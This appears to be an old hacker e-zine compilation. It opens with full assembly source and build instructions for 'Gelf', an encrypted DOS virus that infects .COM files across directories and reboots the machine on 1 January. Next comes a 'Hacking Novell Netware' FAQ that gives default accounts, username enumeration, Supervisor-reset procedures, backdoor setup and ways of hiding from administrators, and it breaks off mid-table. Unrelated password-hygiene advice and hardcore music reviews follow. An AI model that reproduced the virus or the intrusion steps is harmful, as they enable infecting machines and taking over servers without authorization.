ÈÍÍÍÄÄ ú ú ÄÄÍÍͼ Another old virus. The only difference between this and the Pity virus is that it's encrypted. Virus Name : Gelf Author : EXE-Gency Size : 1B6h bytes (file growth) Type : Non-overwriting, non-Resident, encrypted. Targets : *.COM files Stealth : Infects files with any attributes. Restores file's time/date stamp and attributes. General : Infects all files in the current directory and works it's may to the root with '..' calls. (Also restores original directory.) If it's the 1st of January, some details about Gelf will be displayed on the screen. The computer will then wait for a key press then re-boot the machine. Assembling : TASM GELF.ASM TLINK /T GELF.OBJ DO NOT RUN THE GELF.COM FILE IT IS THE VIRUS! 
------------------------------------------------------------------------------
prog    segment                          ; Setup segments
        assume  CS:prog, DS:prog         ; CS+DS in same seg
        org     100h                     ; .COM file

Main:   db      0E9h, 00h, 00h           ; Jump to VirusStart

VirusStart:
        call    GetDelta                 ; Get DeltaOffset
GetDelta:
        pop     bp                       ; Pop IP
        sub     bp, offset GetDelta      ; BP=Delta Offset
        mov     ah, 2Ah                  ; Get Date
        int     21h                      ; DOS Int
        cmp     dx, 0101h                ; 1st January? 1/1/??
        jne     NoPayload                ; No -> Dont display msg
        mov     ah, 09h                  ; Write string
        lea     dx, VirusInfo            ; DX points to VX info
        int     21h                      ; DOS Int
        mov     ah, 01h                  ; Get Keypress
        int     21h                      ; DOS Int
        int     19h                      ; Reboot (but not in WIN95)
NoPayload:
        call    Encrypt_Decrypt          ; Decrypt virus
        jmp     RestoreOldBytes          ; Restore 1st 3 bytes of host

EncryptionVal dw 0000h                   ; Enc/Dec val (0=no encryption)

WriteCode:
        call    Encrypt_Decrypt          ; Encrypt virus
        mov     ah, 40h                  ; Write Virus
        mov     cx, offset virusend-virusstart ; Virus size
        lea     dx, [bp + virusstart]    ; Start of Virus
        int     21h                      ; DOS Int
        call    Encrypt_Decrypt          ; Decrypt
        ret                              ; Return

Encrypt_Decrypt:
        mov     bx, word ptr [bp + EncryptionVal]
        lea     si, [bp + RestoreOldBytes]
        mov     cx, [offset Random - offset RestoreOldBytes]
XORAgain:
        xor     word ptr [si], bx
        inc     si
        inc     si
        loop    XORAgain
        ret

RestoreOldBytes:
        lea     si, [bp + buffer]
        mov     di, 0100h
        movsb
        movsw
        mov     ah, 1Ah
        lea     dx, [bp + virusend]
        int     21h
        mov     ah, 47h
        mov     dl, 00h
        lea     si, CurrentDir
        int     21h
FindFirst:
        mov     ah, 4Eh
        lea     dx, [bp + FileMask]
        mov     cx, 0000h
FindNext:
        int     21h
        jnc     $ + 5
        jmp     DoParent
        mov     ax, 4301h
        mov     cx, 0000h
        lea     dx, [bp + VirusEnd + 1Eh]
        int     21h
        jnc     $ + 5
        jmp     FindMore
        mov     ax, 3D02h
        lea     dx, [bp + virusend + 1Eh]
        int     21h
        jc      RestoreAttribs
        xchg    ax, bx
        mov     ah, 3Fh
        mov     cx, 0003h
        lea     dx, [bp + buffer]
        int     21h
        jc      RestoreAttribs
        cmp     byte ptr [bp + buffer], 0E9h
        jz      RestoreAttribs
        mov     ax, 4202h
        mov     cx, 0000h
        mov     dx, 0000h
        int     21h
        jc      RestoreAttribs
        sub     ax, 03h
        mov     word ptr [bp + jumpbytes + 1], ax
Random:
        mov     ah, 2Ch
        int     21h
        add     dl, dh
        cmp     bx, 00h
        je      Random
        mov     word ptr [bp + EncryptionVal], bx
        call    WriteCode
        mov     ax, 4200h
        mov     cx, 0000h
        mov     dx, 0000h
        int     21h
        jc      RestoreAttribs
        mov     ah, 40h
        mov     cx, 0003h
        lea     dx, [bp + jumpbytes]
        int     21h
RestoreAttribs:
        mov     ax, 4301h
        mov     cx, word ptr [bp + VirusEnd + 15h]
        lea     dx, [bp + VirusEnd + 1Eh]
        int     21h
        mov     ax, 5701h
        mov     cx, word ptr [bp + VirusEnd + 16h]
        mov     dx, word ptr [bp + VirusEnd + 18h]
        int     21h
Close:
        mov     ah, 3Eh
        int     21h
FindMore:
        mov     ah, 4Fh
        jmp     findnext
RestoreDTA:
        mov     ah, 1Ah
        mov     dx, 0080h
        int     21h
        mov     ax, 0100h
        push    ax
        ret
DoParent:
        mov     ah, 3Bh
        lea     dx, Dot_Dot
        int     21h
        jc      RestoreDir
        jmp     FindFirst
RestoreDir:
        mov     ah, 3Bh
        lea     dx, Slash
        int     21h
        jmp     RestoreDTA

FileMask   db '*.com', 00h
Slash      db '\'
CurrentDir db 64 dup (0)
Dot_Dot    db '..', 00h
Buffer     db 0CDh, 20h, 00h
JumpBytes  db 0E9h, 00h, 00h
VirusInfo  db '[Gelf] Virus written by EXE-Gency!$'
VirusEnd:
prog    ends
        end main
------------------------------------------------------------------------------

If you don't have TASM/TLINK, just copy and paste the debug script below into
a new text file and then type:

   debug < filename

and a file called gelf.com will appear. This is the virus so be careful.
PRESENTS: Hacking Novell Netware
By HuSoft

Section 00  General Info

   00-1. What is this "FAQ" for?
   00-2. What is the origin of this FAQ and how do I add to it?
U  00-3. Is this FAQ available by anonymous FTP or WWW?
---------------------------------------------------------------------------
Section 01  Access to Accounts

U  01-1. What are common accounts and passwords in Novell Netware?
U  01-2. How can I figure out valid account names on Novell Netware?
   01-3. What is the "secret" method to gain Supervisor access Novell used
         to teach in CNE classes?
   01-4. What is the cheesy way to get Supervisor access?
   01-5. How do I leave a backdoor?
N  01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access?
---------------------------------------------------------------------------
Section 02  Passwords

   02-1. How do I access the password file in Novell Netware?
   02-2. How do I crack Novell Netware passwords?
N  02-3. What is a "brute force" password cracker?
N  02-4. What is a "dictionary" password cracker?
   02-5. How do I use SETPWD.NLM?
   02-6. What's the "debug" way to disable passwords?
N  02-7. Exactly how do passwords get encrypted?
---------------------------------------------------------------------------
Section 03  Accounting and Account Security

   03-1. What is Accounting?
   03-2. How do I defeat Accounting?
   03-3. What is Intruder Detection?
N  03-4. How do I check for Intruder Detection?
U  03-5. What are station/time restrictions?
   03-6. How do I spoof my node or IP address?
---------------------------------------------------------------------------
Section 04  The Console

   04-1. How do I defeat console logging?
   04-2. Can I set the RCONSOLE password to work for just Supervisor?
N  04-3. How can I get around a locked MONITOR?
---------------------------------------------------------------------------
Section 05  File and Directory Access

   05-1. How can I see hidden files and directories?
   05-2. How do I defeat the execute-only flag?
   05-3. How can I hide my presence after altering files?
   05-4. What is a Netware-aware trojan?
   05-5. What are Trustee Directory Assignments?
   05-6. Are there any default Trustee Assignments that can be exploited?
   05-7. What are some general ways to exploit Trustee Rights?
   05-8. Can access to .NCF files help me?
---------------------------------------------------------------------------
Section 06  Fun with Netware 4.1

   06-1. What is interesting about Netware 4.x's licensing?
N  06-2. How can I tell if something is being Audited?
N  06-3. Where are the Login Scripts stored and can I edit them?
N  06-4. What is the rumored "backdoor" in NDS?
N  06-5. How can I remove NDS?
N  06-6. How can I remove Auditing if I lost the Audit password?
N  06-7. Does 4.x store the LOGIN password to a temporary file?
N  06-8. Everyone can make themselves equivalent to anyone including Admin.
         How?
N  06-9. Can I reset an NDS password with just limited rights?
N  06-10. What is OS2NT.NLM?
N  06-11. Do you have to be Admin equivalent to reset a password?
---------------------------------------------------------------------------
Section 07  Miscellaneous Info on Netware

   07-1. Why can't I get through the 3.x server to another network via
         TCP/IP?
   07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF?
   07-3. How can I login without running the System Login Script?
   07-4. How do I remotely reboot a Netware 3.x file server?
   07-5. How can I abend a Netware server? And why?
   07-6. What is Netware NFS and is it secure?
   07-7. Can sniffing packets help me break in?
N  07-8. What else can sniffing get me?
   07-9. How does password encryption work?
N  07-10. Are there products to help improve Netware's security?
   07-11. What is Packet Signature and how do I get around it?
N  07-12. Do any Netware utilities have holes like Unix utilities?
---------------------------------------------------------------------------
Section 08  Resources

U  08-1. What are some Netware FTP locations?
   08-2. Can I get files without FTP?
U  08-3. What are some Netware WWW locations?
   08-4. What are some Netware USENET groups?
   08-5. What are some Netware mailing lists?
   08-6. Where are some other Netware FAQs?
U  08-7. Where can I get the files mentioned in this FAQ?
   08-8. What are some good books for Netware?
---------------------------------------------------------------------------
Section 09  Netware APIs

   09-1. Where can I get the Netware APIs?
U  09-2. Are there alternatives to Netware's APIs?
---------------------------------------------------------------------------
Section 10  For Administrators Only

U  10-1. How do I secure my server?
   10-2. I'm an idiot. Exactly how do hackers get in?
N  10-3. I have xxx setup and xxx version running. Am I secure?
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Section 00  General Info
---------------------------------------------------------------------------

00-1. What is this "FAQ" for?

This FAQ contains information about hacking Novell Netware. It is intended
to show what and how regarding hacking on Netware, and by illustrating this
in explicit detail show how sys admins can improve security and prevent
break-ins. Most of the information in this FAQ was compiled and collected
from various sources freely available on the Internet. In fact, most of the
information here is OLD info for serious Netware hackers. Some of the info
was collected from these serious Netware hackers, and still more was
collected from "tiger team" security sweeps that I have been involved in.
You will also find hints and generally good ideas for improving and/or
expanding an existing system. This FAQ is a good reference for sys admins
as well as hackers.

---------------------------------------------------------------------------

00-2. What is the origin of this FAQ and how do I add to it?

Send comments about info in this FAQ to thegnome@fastlane.net. Simple flames
about typos and the "that's not right" one-liners will be ignored. If you
wish to contribute corrections please include your research and source of
facts. Also, if you wish to add your information, I will include it if I
can include your email address, unless I can verify the info independently.
This way if someone has questions, they can bug you, not me.

---------------------------------------------------------------------------

00-3. Is this FAQ available by anonymous FTP or WWW?

Look for it in the following locations:

   jumper.mcc.ac.uk    /pub/security/netware    faq.zip
   ftp.fastlane.net    /pub/nomad/nw            faq.zip
   ftp.best.com        /pub/almcepud/hacks      faq.zip
   ftp://infonexus.com/pub/Philes/FAQS/netwareHack.faq.txt.gz
   http://resudox.net/bio/mainpage.html   in the Netware section.

Entire FAQ online, and the reason Al has fits with his ISP ;-):

   http://www.interlog.com/~apayne/nwhack.html

---------------------------------------------------------------------------
---------------------------------------------------------------------------
Section 01  Access to Accounts
---------------------------------------------------------------------------

01-1. What are common accounts and passwords in Novell Netware?

Out of the box Novell Netware has the following default accounts:
SUPERVISOR, GUEST, and Netware 4.x has ADMIN and USER_TEMPLATE as well. All
of these have no password to start with. Virtually every installer quickly
gives SUPERVISOR and ADMIN a password. However, many locations will create
special purpose accounts that have easy-to-guess names, some with no
passwords. Here are a few and their typical purposes:

   Account           Purpose
   ----------------  ------------------------------------------------------
   PRINT             Attaching to a second server for printing
   LASER             Attaching to a second server for printing
   HPLASER           Attaching to a second server for printing
   PRINTER           Attaching to a second server for printing
   LASERWRITER       Attaching to a second server for printing
   POST              Attaching to a second server for email
   MAIL              Attaching to a second server for email
   GATEWAY           Attaching a gateway machine to the server
   GATE              Attaching a gateway machine to the server
   ROUTER            Attaching an email router to the server
   BACKUP            May have password/station restrictions (see below),
                     used for backing up the server to a tape unit attached
                     to a workstation. For complete backups, Supervisor
                     equivalence is required.
   WANGTEK           See BACKUP
   FAX               Attaching a dedicated fax modem unit to the network
   FAXUSER           Attaching a dedicated fax modem unit to the network
   FAXWORKS          Attaching a dedicated fax modem unit to the network
   TEST              A test user account for temp use
   ARCHIVIST         Palidrome default account for backup
   CHEY_ARCHSVR      An account for Arcserve to login to the server from
                     the console for tape backup. Version 5.01g's password
                     was WONDERLAND. Delete the Station Restrictions and
                     use SUPER.EXE to toggle this account and you have an
                     excellent backdoor.
   WINDOWS_PASSTHRU  Although not required, per the Microsoft Win95
                     Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
                     need this for resource sharing without a password.

This should give you an idea of accounts to try if you have access to a
machine that attaches to the server.

A way to "hide" yourself is to give GUEST or USER_TEMPLATE a password.
Occasionally admins will check up on GUEST, but most forget about
USER_TEMPLATE. In fact, _I_ forgot about USER_TEMPLATE until itsme reminded
me.

---------------------------------------------------------------------------

01-2. How can I figure out valid account names on Novell Netware?

Any limited account should have enough access to allow you to run SYSCON,
located in the SYS:PUBLIC directory. If you get in, type SYSCON and press
enter. Now go to User Information and you will see a list of all defined
accounts. You will not get much info with a limited account, but you can
get the account and the user's full name.

If you're in with any valid account, you can run USERLST.EXE and get a list
of all valid account names on the server.

If you don't have access (maybe the sys admin deleted the GUEST account, a
fairly common practice), you can't just try any account name at the LOGIN
prompt. It will ask you for a password whether the account name is valid or
not, and if it is valid and you guess the wrong password, you could be
letting the world know what you're up to if Intruder Detection is on.
But there is a way to determine if an account is valid. From a DOS prompt
use a local copy (on your handy floppy you carry everywhere) of MAP.EXE.
After you've loaded the Netware TSRs up through NETX or VLM, try to map a
drive using the server name and volume SYS:. For example:

   MAP G:=TARGET_SERVER/SYS:APPS

Since you are not logged in, you will be prompted for a login ID. If it is
a valid ID, you will be prompted for a password. If not, you will
immediately receive an error. Of course, if there is no password for the ID
you use you will be attached and mapped to the server.

You can do the same thing with ATTACH.EXE:

   ATTACH TARGET_SERVER/loginidtotry

The same thing will happen as with the MAP command. If valid, you will be
prompted for a password. If not, you get an error.

Another program to check for valid users and the presence of a password is
CHKNULL.EXE by itsme. This program checks for users and whether they have a
password assigned. In 4.1 CHKNULL shows you every account with no password
and you do not have to be logged in. For this to work bindery emulation
must be on.

But there is another way to get them in 4.1: once you load up the VLMs you
may be able to view the entire tree, or at least all of the tree you could
see if logged in. Try this:

   CX /T /A /R

During the installation of 4.1, [Public] has browse access to the entire
tree because [Public] is added to [Root] as a Trustee. The Inherited Rights
Filter flows this stuff down unless explicitly blocked. If you have the
VLMs loaded and access to CX, you don't even have to log in, and you can
get the name of virtually every account on the server.

---------------------------------------------------------------------------

01-3. What is the "secret" method to gain Supervisor access Novell used to
      teach in CNE classes?

Before I start this section, let me recommend another solution. My God, ANY
other solution is better than this! If you are running 3.x, jump to the end
of this section.
The secret method is the method of using a DOS-based sector editor to edit
the entry in the FAT, and reset the bindery to default upon server reboot.
This gives you Supervisor and Guest with no passwords. The method was
taught in case you lost Supervisor on a Netware 2.15 server and you had no
supe equivalent accounts created. It also saves the server from a wipe and
reboot in case the Supervisor account is corrupt, deleted, or trashed.
While you get a variety of answers from Novell about this technique, from
"it doesn't work" to "it is technically impossible", the truth is that it
can be done.

Here are the steps, as quoted from comp.os.netware.security, with my
comments in [brackets]:

[start of quote]

A Netware Server is supposed to be a very safe place to keep your files.
Only people with the right password will have access to the data stored
there. The Supervisor (or Admin) user's password is usually the most well
kept secret in the company, since anyone that has that code could simply
log to the server and do anything he/she wants.

But what happens if this password is lost and there's no user that is
security-equivalent to the supervisor? [Use SETPWD.NLM, instead of this
process, see section 02-3 - S.N.] What happens if the password system is
somehow damaged and no one can log to the network? According to the manual,
there's simply no way out. You would have to reinstall the server and try
to find your most recent backup.

Fortunately, there is a very interesting way to gain complete access to a
Netware server without knowing the Supervisor's (or Admin's) password. You
may imagine that you would have to learn complex decryption techniques or
even type in a long C program, but that's not the case. The trick is so
simple and generic that it will work the same way for Netware 2.x, 3.x and
4.x.

The idea is to fool Netware into thinking that you have just installed the
server and that no security system has been established yet. Just after a
Netware 2.x or 3.x server is installed, the Supervisor's password is null
and you can log in with no restriction. Netware 4.x works slightly
differently, but it also allows anyone to log in after the initial
installation, since the installer is asked to enter a password for the
Admin user.

But how can you make the server think it has just been installed without
actually reinstalling the server and losing all data on the disk? Simple.
You just delete the files that contain the security system. In Netware
2.x, all security information is stored in two files (NET$BIND.SYS and
NET$BVAL.SYS). Netware 3.x stores that information in three files
(NET$OBJ.SYS, NET$VAL.SYS and NET$PROP.SYS). The all new Netware 4.x system
stores all login names and passwords in five different files
(PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS and UNINSTAL.NDS [This last
file may not be there, don't worry - S.N.]).

One last question remains. How can we delete these files if we don't have
access to the network, anyway? The answer is, again, simple. Although the
people from Novell did a very good job encrypting passwords, they left all
directory information easy to find and change if you can access the
server's disk directly, using common utilities like Norton's Disk Edit.
Using this utility as an example, I'll give a step-by-step procedure to
make these files vanish. All you need is a bootable DOS disk, Norton
Utilities' Emergency Disk containing the DiskEdit program and some time
near the server.

1. Boot the server and go to the DOS prompt. To do this, just let the
   network boot normally and then use the DOWN and EXIT commands. This
   procedure does not work on old Netware 2.x servers and in some
   installations where DOS has been removed from memory. In those cases,
   you'll have to use a DOS bootable disk.

2. Run Norton's DiskEdit utility from drive A:

3. Select "Tools" in the main menu and then select "Configuration". At the
   configuration window, uncheck the "Read-Only" checkbox. And be very
   careful with everything you type after this point.

4. Select "Object" and then "Drive". At the window, select the C: drive and
   make sure you check the button "physical drive". After that, you'll be
   looking at your physical disk and you'll be able to see (and change)
   everything on it.

5. Select "Tools" and then "Find". Here, you'll enter the name of the file
   you are trying to find. Use "NET$BIND" for Netware 2, "NET$PROP.SYS" for
   Netware 3 and "PARTITIO.NDS" for Netware 4. It is possible that you find
   these strings in a place that is not the Netware directory. If the file
   names are not all near each other and proportionally separated by some
   unreadable codes (at least 32 bytes between them), then it's not the
   place we are looking for. In that case, you'll have to keep searching by
   selecting "Tools" and then "Find again". [In Netware 3.x, you can change
   all occurrences of the bindery files and it should still work okay, I've
   done it before. - S.N.]

6. You found the directory and you are ready to change it. Instead of
   deleting the files, you'll be renaming them. This will avoid problems
   with the directory structure (like lost FAT chains). Just type "OLD"
   over the existing "SYS" or "NDS" extension. Be extremely careful and
   don't change anything else.

7. Select "Tools" and then "Find again". Since Netware stores the directory
   information in two different places, you have to find the other copy
   and change it the same way. This will again prevent directory structure
   problems.

8. Exit Norton Disk Edit and boot the server again. If you're running
   Netware 2 or 3, your server will already be accessible. Just go to any
   station and log in as user Supervisor. No password will be asked. If
   you're running Netware 4, there is one last step.

9. Load the Netware 4 install utility (just type LOAD INSTALL at the
   console prompt) and select the options to install the Directory
   Services. You'll be prompted for the Admin password while doing this.
   After that, you may go to any station and log in as user Admin, using
   the password that you have selected.

What I did with Norton's Disk Edit could be done with any disk editing
utility with a "Search" feature. This trick has helped me save many network
supervisors in the last years. I would just like to remind you that no one
should break into a netware server unless authorized to do it by the
company that owns the server. But you probably know that already.

[end of quote]

I actually had this typed up but kept changing it, so I stole this quote
from the newsgroup to save me retyping ;-)

Now the quicky for 3.x users. Use LASTHOPE.NLM, which renames the bindery
and downs the server. Reboot and you have Supe and Guest, no password.

---------------------------------------------------------------------------

01-4. What is the cheesy way to get Supervisor access?

The cheesy way is the way that will get you in, but it will be obvious to
the server's admin that the server has been compromised. This technique
works for 3.11. Using NW-HACK.EXE, if the Supervisor is logged in NW-HACK
does the following things: 1) the Supervisor password is changed to
SUPER_HACKER, 2) every account on the server is made a supe equivalent, and
3) the sys admin is going to know very quickly something is wrong. What the
admin will do is remove the supe rights from all accounts that are not
supposed to have them and change the Supervisor password back. The only
thing you can do is leave a backdoor for yourself (see next question).

---------------------------------------------------------------------------

01-5. How do I leave a backdoor?

Once you are in, you want to leave a way back with supe equivalency. You
can use SUPER.EXE, written for the express purpose of allowing the non-supe
user to toggle on and off supe equivalency. If you use the cheesy way in
(previous question), you turn on the toggle before the admin removes your
supe equivalency.
If you gain access to a supe equivalent account, give Guest supe
equivalency and then login as Guest and toggle it on. Now get back in as
the original supe account and remove the supe equivalency. Now Guest can
toggle on supe equivalency whenever it's convenient. Of course Guest
doesn't have to be used; it could be another account, like an account used
for e-mail administration or an e-mail router, a gateway's account, you get
the idea.

Now SUPER.EXE is not completely clean. Running the Security utility or
Bindfix will give away that an account has been altered at the bindery
level, but the only way for an admin to clear the error is to delete and
rebuild the account.

Another backdoor is outlined in section 02-2 regarding the replacement
LOGIN.EXE and PROP.EXE.

---------------------------------------------------------------------------

01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access?

If you have two volumes or some unallocated disk space you can use this
hack to get Supe. Of course you need physical access but it works. I got
this from a post in comp.os.security.netware:

- Dismount all volumes
- Rename SYS: to SYSOLD:
- Rename VOL1: (or whatever) to SYS: or create new SYS: on new disk
- Reboot server
- Mount SYS: and SYSOLD:
- Attach to server as Supervisor (Note: login not available)
- Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD
- Dismount volumes
- Rename volumes back to correct names
- Reboot server
- Login as Supervisor, no password due to new bindery
- Run BINDREST
- You are currently logged in as Supe, you can create a new user as Supe
  equiv and use this new user to reset Supe's password, whatever.

---------------------------------------------------------------------------
---------------------------------------------------------------------------
Section 02  Passwords
---------------------------------------------------------------------------

02-1. How do I access the password file in Novell Netware?
Contrary to not-so-popular belief, access to the password file in Netware
is not like Unix - the password file isn't in the open. All objects and
their properties are kept in the bindery files on 2.x and 3.x, and kept in
the NDS database in 4.x. An example of an object might be a printer, a
group, an individual's account etc. An example of an object's properties
might include an account's password or full user name, or a group's member
list or full name. The bindery files' attributes (or flags) in 2.x and 3.x
are Hidden and System, and these files are located on the SYS: volume in
the SYSTEM subdirectory. Their names are as follows:

   Netware version   File Names
   ---------------   ----------
   2.x               NET$BIND.SYS, NET$BVAL.SYS

PRESENTS: Password Security: The Core of Protection
By: HuSoft

Virtually every computer service to which you log in employs a simple
password protection scheme. Your account is assigned a unique user name and
a password, both of which you must type in order to log in. Generally, the
system administration staff will allow (and even encourage) you to change
your own password; some systems employ automated processes that insist that
you make such changes periodically.

One of the simplest ways that intruders compromise password security is by
repetitively trying possible passwords against known valid user IDs. This
process can be conducted via an automated process; the intruder uses a
computer program to attempt the break-in. One scheme, sometimes called
"attack guessing", tries to determine a real password by seeing if any of a
long list of candidate passwords in fact allows entry. Most systems will
hang up a connection after several failed attempts to log in, but they may
not detect repeated connections. Moreover, it is relatively common for Unix
password files to be available to prying eyes. This is possible because
these files are encrypted, so possession of the file does not equate to
discovery of passwords. However, once a password file is in the hands of a
would-be intruder, special "cracker" software will repetitively encrypt
candidate passwords and try them against the encrypted form.

There are some straightforward rules for account and password
administration, but many users fail to take heed. If you follow these
rules, the chances of your account being compromised are greatly reduced.
If you fail to follow these rules, you are asking for trouble.

1. Pick a password that does not relate in some obvious way to you. Do not
   use the name of your spouse, your child, or your pet. Do not use your
   initials, your telephone number, or the mascot of your alma mater. These
   pieces of information may be much more public than you realise.

2. It is best to choose a word that is not a real word in any language.
   Some "attack guessing" schemes check to see if words out of standard
   dictionaries happen to match your password. A good approach is to pick
   the first letter of each word of a sentence that only you would devise.

3. Opt for a longer password over a short one. If your system allows eight
   character passwords, use all eight characters instead of three or four.
   Shorter passwords are more easily matched by cracker programs. If your
   system allows you to use mixed case letters as well as special
   characters, this can also make the password harder to crack. (It can
   also make the password harder to remember.)

4. If you write a password down, put the paper copy in a secure place. Some
   guidelines suggest that you never write down a password, but the
   practical reality is that humans inevitably will do this.

5. Do not reveal your password to anyone. A new generation of network con
   artist sometimes employs the scam of masquerading as a security expert
   trying to catch an intruder, if only you will assist by providing your
   password. Don't fall for it.

6. Do not use the same password on multiple services. This rule is
   especially important, and especially often ignored. You cannot trust
   that all system administrators will protect your password. In
   particular, a dial-up bulletin board service run by a lone sysop out of
   his bedroom is not likely to have the same level of security as a major
   Internet service provider. In the event of a major break-in, your
   password becomes the key to all the systems you have access to, unless
   you vary the password used on different services.

7. If you have any reason to believe a password has been compromised,
   change it immediately. Change passwords frequently in any event.

8. Most systems will provide you with information as to the last time you
   logged in, as well as the last time someone attempted to log in but
   failed. This is useful information - but the tendency is to let it
   scroll by unread. If you notice activity that doesn't correspond to your
   logins, change your password and contact your system administrator.

If you become an information provider running your own system, there are
some special points to consider:

1. Some computer operating systems are delivered with a set of "stock"
   initial passwords. Unless you change these passwords - all of them - you
   are exposed to a very simple attack from someone who has the manuals for
   the same system.

2. When you are away from the system you administer, be very cautious
   about logging in over the Internet using secure passwords. An
   unscrupulous local administrator or user could be listening in. Consider
   isolating your everyday tasks, such as reading mail, on a user ID that
   has no special privileges.

3. Many computer systems offer logging facilities that allow you to inspect
   patterns of use and abuse - for instance repeatedly failed login
   attempts. Use these tools to keep your eyes out for intruders. Use both
   the logging facilities of the native operating system and whatever tools
   you may install.

4. Most corporate and campus networks have network administrators whose
   jobs include security. Ask your network administrator to audit your
   system setup to be sure it is secure. Also ask your network
   administrator to sign you up for local distribution of the Computer
   Emergency Response Team (CERT) mailing list. These reports detail
   specific weaknesses discovered in various flavors of various operating
   systems, and they tell system administrators how to work around these
   flaws while waiting for vendor responses.

5. If you install public client programs - programs that allow users to
   avail themselves of services without authentication - make sure the
   environment opened to these users is secure. Watch for openings in
   programs like more and telnet that may allow users more privilege than
   you want to offer to users whose identity is not known. Your local
   network administrator should be able to offer advice.

The basic mode of operation of Ethernet and other local area networks that
employ shared media implies a certain inherent opportunity for intruders to
"sniff" passwords. On large corporate and campus networks, this exposure
can be isolated to departments or buildings through the use of routers. In
some cases, where security of communication across a campus or wide-area
links is essential, network administrators may acquire and install routers
with built-in encryption capability. If you work on a campus or corporate
network, and you are concerned about this aspect of security, ask your LAN
or campus network administrator for details as to the level of exposure.

PRESENTS: TRACKED MUSIC REVIEWS
          ~~~~~~~~~~~~~~~~~~~~~
By: Walrus & CrossFire

This section is running in conjunction with http://walrus.bog.net/. All of
the tunes and mixes reviewed by me (Walrus) are available for listening or
downloading from my site.
Tracks that CrossFire reviews may also be there, but no promises. Where possible, a URL will be supplied. Well, that's the theory anyway. A big shout goes out to Emulation, who has donated 500Mb of server space on http://www.oldskool-hardcore.i12.com/ to allow this to continue, and to frOsty, who is hosting a few of the mixes on http://www.tbp.mb.ca/audio/. Thanks to both of them.

Not all the tracks and mixes that we review are happy hardcore. We review oldskool, techno, drum 'n' bass, trance and more. Yes, even Gabber. Although we tend to stick to hardcore.

If you would like either of us to review any tracks or mixes, send mods/mp3s/vqfs/realaudios or whatever your chosen format is to up_reviews@hotmail.com and either me or CrossFire will review it. Please don't send huge files though. For example, sending a 1 hour mix in mp3 format is not appropriate. If you want an address to send records/CDs/tapes to, just drop one of us an email.

This month's reviews:
~~~~~~~~~~~~~~~~~~~~~

Title: DJ Dodgee - Untitled mixtape 2
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore

Tracklist:
Kaos & Darkcyde - Tubular Vibes
BDB feat. Lisa A - I Want You 2 Mental - Generation Love
E-Logic - The Gate
Class of '94 - Lift You One Stage Higher
Robbie Long & Devestate feat. Leroy - Flip Flop Flava
Brisk & Trixxy - Eye Opener (Brisk '99 remix)
Hixxy - Starry Night
Slipmatt & Eruption - Bust The New Jam (Brisk remix) B'n'H vol.1
Supernova - Go
DJ Bang - Give Me A Reason
Vinylgroover - John Gotti's Revenge
Tayla & Blade - Hamburg
Rapido - Ultraviolet
Bang - Hyperspace

When I reviewed one of Dodgee's mixes in the last issue, I said: "Expect to see more from Dodgee, with a slightly more refined sound". That more refined sound is very apparent on this tape. The mixing is smoother overall. The punches are better, and there's even more of that excellent scratching. As for the tracks, there's an absolutely excellent selection of tracks in there. Not much to keep the cheezers happy though, so if that's your style give it a miss, but overall this tape comes highly recommended.

Title: DJ Skippy - Awakening
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore

This track by DJ Skippy has not (yet) been scheduled for release, but may appear on a Skippin Trax release sometime in the future. It's a fairly trancey affair which sounds a little like the Braveheart theme. There's nice little synth lines dropped in all over the place, interspersed with pianos and the like, and every time I listen to it I seem to hear something which I didn't notice first time round. This is an absolutely solid tune in my opinion. Deserves to be released as soon as possible.

Title: DJ Skippy - Skippin Trax 002
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore

Skippin Trax 002 is going to have 3 tracks on it, and will probably be released in mid-late November. I have reviewed 2 of the tracks from it here, as the other one hasn't been written/recorded yet.

Side A (Energy 2000) is a happy, bouncy track using a few well known samples ("spread out and scatter" anybody?). Lots of different stuff going on here, but not fragmented. The track manages to be very happy without being cheezy. There's even some nice stompy bassdrum in there to shake the floor with.

Side B (Mystery) starts off with some good breakbeats and basslines and bounces along nicely with a few little vocal samples before bringing in some trancy synths. The track really picks up with a big bassdrum fill and bounces along with the same trancey synths until it picks up the breakbeats again for the outro.

On the basis of the two tracks I have reviewed here (remember there's going to be another one on there too) I advise anybody who likes their happy hardcore to go out and buy this record when it is released.

Title: DJ Sparkey - Hardcore Crazy
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore/Gabber

This is a cool track. At 210bpm and with its hard loud kickdrums at the beginning, it's fairly gabber-esque. But at the same time there's an element of happy hardcore in there. Although it does seem to lack something where the piano line is introduced, it quickly picks up, and regains a lot of the harder elements of the track. I haven't really heard anybody mix happycore and gabber together like this before, and it works surprisingly well. Don't forget to check out Sparkey's show on Inside Beat. Check out www.inside-beat.net for details of tuning in.

Title: DJ Sparkey - Hardcore Frills
Reviewed by: Walrus
Available from: http://walrus.bog.net
Style: Happy Hardcore

This track starts off a bit weak, with a single piano line, but improves as basslines and breakbeats are added to it. For a while it sounds fairly cool. However the track just loses it somewhere along the line, and never really goes anywhere. It ends up as a fairly cheezy affair. It's OK, but Hardcore Crazy is a much better track.

Title: DJ Smurf - Gabba Dabba Doo - 160 Shits Per Minute (Mixtape)
Reviewed by: CrossFire
Available from: Email smurf: Glen_Peterson@qsp.co.uk
Style: Gabber

Tracklisting:
Dr Macabre - Ghost Stories (Powerplant)
Omar Santana - Digital Domain (H2OH)
The Horrorist - Flesh Is The Fever (Things To Come)
Boombastic - Leaders Of The New School (Baby Boom)
DJ Promo - Guns & Ammo (ID&T)
DJ Sim - Simbiosis (ID&T)
The Masochist - Cold Cage (ID&T)
Bass D & King Matthew - How Shall I (ID&T)
Rotterdam Terror Corps - Beethoven On XTC (Dark Twins Remix) (Megarave)
Doomaniac - Beat On Da Kick Drum (Mindcrash)
Dr Macabre - Danse Macabre (Megarave)
Members Of Megarave - Maniac (Megarave)
Evil Activities - Darkness Of Noom (Rotterdam)
DJ Mad E Fact - The Hustle (Baby Boom)
Damien Kelly & Attic & Stylz - State Of The Nation (Hollow Point)
Damien Kelly & The Unknown MC - The People Want More (Hollow Point)

